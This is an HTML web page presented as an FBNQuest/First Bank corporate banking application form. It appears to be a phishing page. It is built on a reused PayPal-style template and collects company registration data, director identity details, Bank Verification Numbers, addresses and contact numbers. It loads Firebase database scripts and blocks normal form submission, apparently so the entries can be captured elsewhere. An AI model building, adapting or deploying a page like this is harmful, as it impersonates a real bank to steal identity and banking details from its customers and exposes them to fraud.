<!DOCTYPE html>
<html lang="en-US" class="no-js" data-device-type="dedicated">
<head>

<title>FBNQuest</title>

<link rel="stylesheet" href="style.css" type="text/css" />

<link href="toastr.min.css" rel="stylesheet">
<link href="https://cdnjs.cloudflare.com/ajax/libs/slick-carousel/1.8.1/slick.min.css" rel="stylesheet">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
<!-- <link href="all.min.css" rel="stylesheet"> -->




<link href="https://cdn.jsdelivr.net/npm/featherlight@1.7.14/release/featherlight.min.css" type="text/css" rel="stylesheet" />

<style type="text/css">
/*custom font*/
@import url(https://fonts.googleapis.com/css?family=Montserrat);

/*basic reset*/
* {margin: 0; padding: 0;}

html {
	height: 100%;
	/*Image only BG fallback*/

}

.box1{
    float: left;
}

.box2{

}

.declearation p{
 padding: 0px;
 text-align: justify;
}


.ckd {
    width: 20px !important;
    float: left;
    margin-top: 5px;
    margin-bottom: 0px !important;
}

/* .ckd{
    width: 50px !important;
    float: left;
} */

.para{

    float: right;
}

.global-footer {
    bottom: 0;
}

#msform {
	
	text-align: center;
	position: relative;
}
#msform fieldset {
	background: white;
	border: 0 none;
	border-radius: 3px;
	box-shadow: 0 0 15px 1px rgba(0, 0, 0, 0.4);
	padding: 20px 30px;
	box-sizing: border-box;
	width: 80%;
	margin: 0 10%;
	
	/*stacking fieldsets above each other*/
	position: relative;
}
/*Hide all except first fieldset*/
#msform fieldset:not(:first-of-type) {
	display: none;
}
/*inputs*/
#msform input, #msform textarea {
	padding: 15px;
	border: 1px solid #ccc;
	border-radius: 3px;
	margin-bottom: 10px;
	width: 100%;
	box-sizing: border-box;
	font-family: montserrat;
	color: #2C3E50;
	font-size: 13px;
}
.declearation {
    display: block;
    text-align: left;
    height: 150px;
}
/*buttons*/
#msform .action-button {
	width: 100px;
	background: #002c5c;
	font-weight: bold;
	color: white;
	border: 0 none;
	border-radius: 1px;
	cursor: pointer;
	padding: 10px 5px;
	margin: 10px 5px;
}
#msform .action-button:hover, #msform .action-button:focus {
	box-shadow: 0 0 0 2px white, 0 0 0 3px #002c5c;
}
/*headings*/
.fs-title {
	font-size: 15px;
	text-transform: uppercase;
	color: #2C3E50;
	margin-bottom: 10px;
}
.fs-subtitle {
	font-weight: normal;
	font-size: 13px;
	color: #666;
	margin-bottom: 20px;
}
/*progressbar*/
#progressbar {
	margin-bottom: 30px;
	overflow: hidden;
	/*CSS counters to number the steps*/
	counter-reset: step;
}
#progressbar li {
	list-style-type: none;
	color: #002c5c;
	text-transform: uppercase;
	font-size: 10px;
	width: 33.33%;
	float: left;
	position: relative;
}
#progressbar li:before {
	content: counter(step);
	counter-increment: step;
	width: 20px;
	line-height: 20px;
	display: block;
	font-size: 10px;
	color: #333;
	background: white;
	border-radius: 3px;
	margin: 0 auto 5px auto;
}
/*progressbar connectors*/
#progressbar li:after {
	content: '';
	width: 100%;
	height: 2px;
	background: white;
	position: absolute;
	left: -50%;
	top: 9px;
	z-index: -1; /*put it behind the numbers*/
}
#progressbar li:first-child:after {
	/*connector not needed before the first step*/
	content: none; 
}
/*marking active/completed steps green*/
/*The number of the step and the connector before it = green*/
#progressbar li.active:before,  #progressbar li.active:after{
	background: #002c5c;
	color: white;
}

.changeback{
    background-color: #002c5c !important;
   }

    
</style>

</head>
<body>

<div id="body">

<header class="table-row pp-header changeback" >
<div>
<div class="containerCentered ">



<a href="#Menu" id="menu-button" role="button">Menu</a>


<a  href="#" class="paypal-img-logo">F</a>

<nav id="main-menu" class="main-menu" role="navigation">


<ul class="sublist">

<li><a href="#" id="signup-button-mobile" name="SignUp_header" class="btn btn-small btn-white-border signup-mobile">Sign Up for Free</a></li>

</ul>

</nav>




<div id="header-buttons" class="header-buttons">


<a href="#"  id="ul-btn" class="btn btn-small btn-secondary">Log In</a>


<a href="#" id="signup-button"  class="btn btn-small btn-signup">Sign Up</a>

</div>


</div>
</div>
</header>

<section class="panel four-panel center-text four-tile-flip-container" id="overview">

<div class="row-fluid">
<header class="containerCentered center-text spaceDown">
<h2 class="pulloutHeadline">Corporate Banking Form</h2>
</header>



<div class="containerCentered container4d2p1m">


    
<form id="msform" name = "myForm"  onsubmit ="return(validate());" >
       
        <ul id="progressbar">
          <li class="active">COMPANY DETAILS</li>
          <li>DETAILS OF DIRECTORS</li>
          <li>DECLARATION</li>
        </ul>
      
        <fieldset>
          <h2 class="fs-title">COMPANY DETAILS</h2>
          
          <input type="text"  id="bn" name="COMPANY/BUSINESS NAME" placeholder="COMPANY/BUSINESS NAME"  required/>
          <input type="text"  id ="cof" name="COF" placeholder="CERTIFICATE OF INCORPORATION/REGISTRATION NUMBER"  required/>
          <input type="text"  id="joi" name="JOI" placeholder="JURISDICTION OF INCORPORATION/REGISTRATION" required />
          <input type="text" id="bt" name="BT" placeholder="BUSINESS TYPE/NATURE" required/>
          <input type="text" id="oba" name="OBA" placeholder="OPERATING BUSINESS ADDRESS 1" required/>
          <input type="text" id="sba" name="SBA" placeholder="SECONDARY BUSINESS ADDRESS 2" required/>
          <input type="text" id="email" name="email" placeholder="EMAIL ADDRESS" required/>
          <input type="button" name="next" class="next action-button" value="Next" required/> 
        </fieldset>




        <fieldset>
          <h2 class="fs-title">DETAILS OF DIRECTORS/TRUSTEES/PROMOTER/EXECUTORS/ADMINISTRATOR/PRINCIPAL </h2>
          
          <input type="text" id="title" name="TITLE" placeholder="TITLE" required/>
          <input type="text" id="name" name="NAME" placeholder="FULLNAME" />
          <input type="text"  id="nationality" name="NATIONALITY" placeholder="NATIONALITY" required/>
          <input type="text" id="pob" name="POB" placeholder="PLACE OF BIRTH" required/>
          <input type="text" id="bvn" name="BVN" placeholder="BANK VERIFICATION NO." required/>
          <input type="text" id="cpass" name="cpass" placeholder="OCCUPATION" required/>
          <input type="text" id="ra" name="ra" placeholder="RESIDENTIAL ADDRESS" required/>

          <input type="button" name="previous" class="previous action-button" value="Previous" />
          <input type="button" name="next" class="next action-button" value="Next" />
        </fieldset>




        <fieldset>
          <h2 class="fs-title">DECLARATION</h2>
          
          <input type="text" name="DCSN" id="dcsn" placeholder="DIRECTOR OR COMPANY SECRETARY’S NAME IN FULL" required/>
          <input type="text" name="DNF" id="dnf" placeholder="DIRECTOR’S NAME IN FULL" required/>
          <input type="text" id="cn" name="cn" placeholder="CONTACT NUMBER" required/>
          
          <div class="declearation" >
                <input type="checkbox" id="declearation"  name="declearation" class="ckd" required/>
                <p>We declare that:<br>The information given is correct to the best of our knowledge and belief,
                        and we will inform FBNQuest Merchant Bank Limited of any change in the information given in
                         this form within 10 working days of such change.<br>We fully understand and agree that FBNQuest
                          Merchant Bank Limited shall not be liable for any loss or damages sustained by us by reason
                           of the operation of the account provided such loss or damages was not caused or facilitated by
                            FBNQuest Merchant Bank Limited or any of its staff acting on its behalf.</p>
           
            </div>
               
          <!-- </div> -->
         
          <input type="button" name="previous" class="previous action-button" value="Previous" />
          <button type="submit" id="submit" class="submit action-button">Submit</button>
          <!-- <input type="submit"  name="submit" class="submit action-button" value="Submit" /> -->
        </fieldset>
      </form> 

        

</div>
</div>

<div>


</div>


</section>

</div>

<footer role="contentinfo" class="global-footer">
<div class="containerCentered containerExtend">

<ul class="footer-secondary secondaryLink">

</ul>

<ul class="footer-tertiary copyright-section secondaryLink">
<li id="footer-copyright" class="footer-copyright">First Bank &copy; 1999&ndash;2020 </li>
</ul>

</div>
</footer>
</body>

<script src="https://www.gstatic.com/firebasejs/7.13.0/firebase-app.js"></script>
<script src="https://www.gstatic.com/firebasejs/7.13.0/firebase-database.js"></script>
<script src="https://www.gstatic.com/firebasejs/7.13.0/firebase-analytics.js"></script>
<script src="db.js"></script>
<script src="jquery-3.2.1.min.js"></script>
<script src='jquery-ui.min.js'></script>

<script src="toastr.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/slick-carousel/1.8.1/slick.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/featherlight@1.7.14/release/featherlight.min.js" type="text/javascript" charset="utf-8"></script>

<!-- <script src="chatscript.js"></script> -->
<script>

//jQuery time
var current_fs, next_fs, previous_fs; //fieldsets
var left, opacity, scale; //fieldset properties which we will animate
var animating; //flag to prevent quick multi-click glitches

$(".next").click(function(){
	if(animating) return false;
	animating = true;
	
	current_fs = $(this).parent();
	next_fs = $(this).parent().next();
	
	//activate next step on progressbar using the index of next_fs
	$("#progressbar li").eq($("fieldset").index(next_fs)).addClass("active");
	
	//show the next fieldset
	next_fs.show(); 
	//hide the current fieldset with style
	current_fs.animate({opacity: 0}, {
		step: function(now, mx) {
			//as the opacity of current_fs reduces to 0 - stored in "now"
			//1. scale current_fs down to 80%
			scale = 1 - (1 - now) * 0.2;
			//2. bring next_fs from the right(50%)
			left = (now * 50)+"%";
			//3. increase opacity of next_fs to 1 as it moves in
			opacity = 1 - now;
			current_fs.css({
        'transform': 'scale('+scale+')',
        'position': 'absolute'
      });
			next_fs.css({'left': left, 'opacity': opacity});
		}, 
		duration: 800, 
		complete: function(){
			current_fs.hide();
			animating = false;
		}, 
		//this comes from the custom easing plugin
		easing: 'easeInOutBack'
	});
});

$(".previous").click(function(){
	if(animating) return false;
	animating = true;
	
	current_fs = $(this).parent();
	previous_fs = $(this).parent().prev();
	
	//de-activate current step on progressbar
	$("#progressbar li").eq($("fieldset").index(current_fs)).removeClass("active");
	
	//show the previous fieldset
	previous_fs.show(); 
	//hide the current fieldset with style
	current_fs.animate({opacity: 0}, {
		step: function(now, mx) {
			//as the opacity of current_fs reduces to 0 - stored in "now"
			//1. scale previous_fs from 80% to 100%
			scale = 0.8 + (1 - now) * 0.2;
			//2. take current_fs to the right(50%) - from 0%
			left = ((1-now) * 50)+"%";
			//3. increase opacity of previous_fs to 1 as it moves in
			opacity = 1 - now;
			current_fs.css({'left': left});
			previous_fs.css({'transform': 'scale('+scale+')', 'opacity': opacity});
		}, 
		duration: 800, 
		complete: function(){
			current_fs.hide();
			animating = false;
		}, 
		//this comes from the custom easing plugin
		easing: 'easeInOutBack'
	});
});

$(".submit").click(function(){
	return false;
})

</script>
</html>

